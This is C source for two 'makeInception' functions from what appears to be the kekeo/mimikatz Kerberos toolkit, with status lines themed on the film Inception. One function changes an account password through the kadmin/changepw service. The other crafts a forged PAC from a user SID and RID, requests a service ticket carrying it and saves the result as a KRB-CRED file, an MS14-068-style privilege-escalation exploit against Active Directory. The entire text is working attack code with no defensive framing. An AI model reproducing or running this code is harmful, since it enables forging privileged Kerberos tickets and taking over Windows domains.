void makeInception(PCSTR user, PCSTR domain, PCSTR newpassword, EncryptionKey *key, PCSTR kdc, WORD port, WORD kadminPort) { SOCKET connectSocket, connectSocketAdmin; OssBuf AsReq, ApReq, KrbPrivReq; KDC_REP *AsRep; AP_REP *ApRep; KRB_PRIV *KrbPriv; EncKDCRepPart *encAsRepPart; _octet1 password; EncryptionKey authKey; UInt32 seq; EncKrbPrivPart *encKrbPrivPart; password.length = strlen(newpassword); password.value = (unsigned char *) newpassword; if(kull_m_sock_initSocket(kdc, port, &connectSocket)) { kprintf(" [level 1] Reality (AS-REQ)\n"); if(kull_m_kerberos_asn1_helper_build_KdcReq(user, domain, key, "kadmin", "changepw", NULL, FALSE, NULL, NULL, &AsReq)) { if(kull_m_kerberos_helper_net_callKdcOssBuf(&connectSocket, &AsReq, (LPVOID *) &AsRep, AS_REP_PDU)) { if(kull_m_kerberos_asn1_helper_build_EncKDCRepPart_from_Rep(AsRep, &encAsRepPart, key, EncASRepPart_PDU)) { kprintf(" [level 2] Van Chase (AP-REQ)\n"); if(kull_m_kerberos_asn1_helper_build_ApReq(&ApReq, user, domain, &AsRep->ticket, &encAsRepPart->key, KRB_KEY_USAGE_AP_REQ_AUTHENTICATOR, &authKey, &seq)) { kprintf(" [level 3] The Hotel (KRB-PRIV - REQ)\n"); if(kull_m_kerberos_asn1_helper_build_KrbPriv(&password, &authKey, "wtf", &KrbPrivReq, &seq)) { if(kull_m_sock_initSocket(kdc, kadminPort, &connectSocketAdmin)) { if(kull_m_kerberos_helper_net_callKadminOssBuf(&connectSocketAdmin, &ApReq, &KrbPrivReq, &ApRep, &KrbPriv)) { kprintf(" [level 4] Snow Fortress (KRB-PRIV - REP)\n"); if(kull_m_kerberos_asn1_helper_build_EncKrbPrivPart_from_Priv(KrbPriv, &encKrbPrivPart, &authKey)) { kprintf(" [level 5] Limbo ! : "); retFromKadmin(&encKrbPrivPart->user_data); kull_m_kerberos_asn1_helper_ossFreePDU(EncKrbPrivPart_PDU, encKrbPrivPart); } kull_m_kerberos_asn1_helper_ossFreePDU(KRB_PRIV_PDU, KrbPriv); kull_m_kerberos_asn1_helper_ossFreePDU(AP_REP_PDU, ApRep); } kull_m_sock_termSocket(&connectSocketAdmin); } kull_m_kerberos_asn1_helper_ossFreeBuf(KrbPrivReq.value); } kull_m_kerberos_asn1_helper_ossFreeBuf(ApReq.value); } kull_m_kerberos_asn1_helper_ossFreePDU(EncASRepPart_PDU, encAsRepPart); } kull_m_kerberos_asn1_helper_ossFreePDU(AS_REP_PDU, AsRep); } kull_m_kerberos_asn1_helper_ossFreeBuf(AsReq.value); } kull_m_sock_termSocket(&connectSocket); } }
void makeInception(PCSTR user, PCSTR domain, PSID sid, DWORD rid, PCSTR target, PCSTR service, EncryptionKey *key, PCSTR kdc, WORD port, PCSTR filename) { SOCKET connectSocket; OssBuf AsReq, TgsReq; KDC_REP *AsRep, *TgsRep; EncKDCRepPart *encAsRepPart, *encTgsRepPart; _octet1 pac; if(kull_m_sock_initSocket(kdc, port, &connectSocket)) { kprintf(" [level 1] Reality (AS-REQ)\n"); if(kull_m_kerberos_asn1_helper_build_KdcReq(user, domain, key, NULL, NULL, FALSE, NULL, NULL, &AsReq)) { if(kull_m_kerberos_helper_net_callKdcOssBuf(&connectSocket, &AsReq, (LPVOID *) &AsRep, AS_REP_PDU)) { if(kull_m_kerberos_asn1_helper_build_EncKDCRepPart_from_Rep(AsRep, &encAsRepPart, key, EncASRepPart_PDU)) { kprintf(" [level 2] Van Chase (PAC TIME)\n"); if(giveMePac(user, sid, rid, &encAsRepPart->authtime, KERB_CHECKSUM_MD5, NULL, &pac)) { kprintf(" [level 3] The Hotel (TGS-REQ)\n"); if(kull_m_kerberos_asn1_helper_build_KdcReq(user, domain, &encAsRepPart->key, service, target, FALSE, &AsRep->ticket, &pac, &TgsReq)) { if(kull_m_kerberos_helper_net_callKdcOssBuf(&connectSocket, &TgsReq, (LPVOID *) &TgsRep, TGS_REP_PDU)) { if(kull_m_kerberos_asn1_helper_build_EncKDCRepPart_from_Rep(TgsRep, &encTgsRepPart, &encAsRepPart->key, EncTGSRepPart_PDU)) { kprintf(" [level 4-5] Limbo (KRB-CRED)\n"); kull_m_kerberos_helper_util_SaveRepAsKrbCred(TgsRep, encTgsRepPart, filename); kull_m_kerberos_asn1_helper_ossFreePDU(EncTGSRepPart_PDU, encTgsRepPart); } kull_m_kerberos_asn1_helper_ossFreePDU(TGS_REP_PDU, TgsRep); } kull_m_kerberos_asn1_helper_ossFreeBuf(TgsReq.value); } LocalFree(pac.value); } kull_m_kerberos_asn1_helper_ossFreePDU(EncASRepPart_PDU, encAsRepPart); } kull_m_kerberos_asn1_helper_ossFreePDU(AS_REP_PDU, AsRep); } kull_m_kerberos_asn1_helper_ossFreeBuf(AsReq.value); } kull_m_sock_termSocket(&connectSocket); } }